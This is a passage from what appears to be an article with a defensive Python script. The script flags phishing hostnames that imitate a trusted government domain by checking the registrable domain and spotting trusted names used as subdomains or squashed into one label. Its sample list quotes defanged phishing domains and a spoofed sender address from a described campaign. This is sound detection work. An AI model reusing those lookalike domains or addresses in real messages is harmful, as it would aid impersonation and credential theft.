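        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return host


def assess(indicator: str) -> Verdict:
    host = extract_host(indicator)
    reg = registrable_domain(host)
    if reg in TRUSTED_DOMAINS:
        return Verdict(host, reg, False, "registrable domain is trusted")
    labels = host.split(".")
    for trusted in TRUSTED_DOMAINS:
        t_labels = trusted.split(".")
        n = len(t_labels)
        # Trusted name used as subdomain labels of somebody else's domain.
        if any(labels[i:i + n] == t_labels for i in range(len(labels) - n + 1)):
            return Verdict(host, reg, True,
                           f"'{trusted}' appears as subdomain labels of '{reg}'")
        # Trusted name with its dots removed, registered under another TLD.
        if trusted.replace(".", "") in labels:
            return Verdict(host, reg, True,
                           f"'{trusted}' squashed into one label, registered as '{reg}'")
    return Verdict(host, reg, False, "no relation to a trusted domain")


def assess_all(indicators: List[str]) -> List[Verdict]:
    return [assess(i) for i in indicators]


# Indicators quoted in the article, as written there (defanged), plus one
# constructed benign URL to show the multi-label suffix case.
SAMPLE_INDICATORS = [
    "https://www.transportation.gov/",
    "transportation.gov.bidprocure.secure.akjackpot[.]com",
    "mike.reynolds@transportationgov[.]us",
    "transportationgov[.]net",
    "https://example.co.uk/path",
]

if __name__ == "__main__":
    for v in assess_all(SAMPLE_INDICATORS):
        print(f"{'SUSPICIOUS' if v.suspicious else 'ok':10} {v.host:55} {v.reason}")
```

    The registrable-domain step is the one that matters: mail filters and users both tend to read hostnames left to right, while the part that identifies the owner is on the right. Pairing this check with a registration-age lookup (both phishing domains here were days old) catches the rest of what Kay describes.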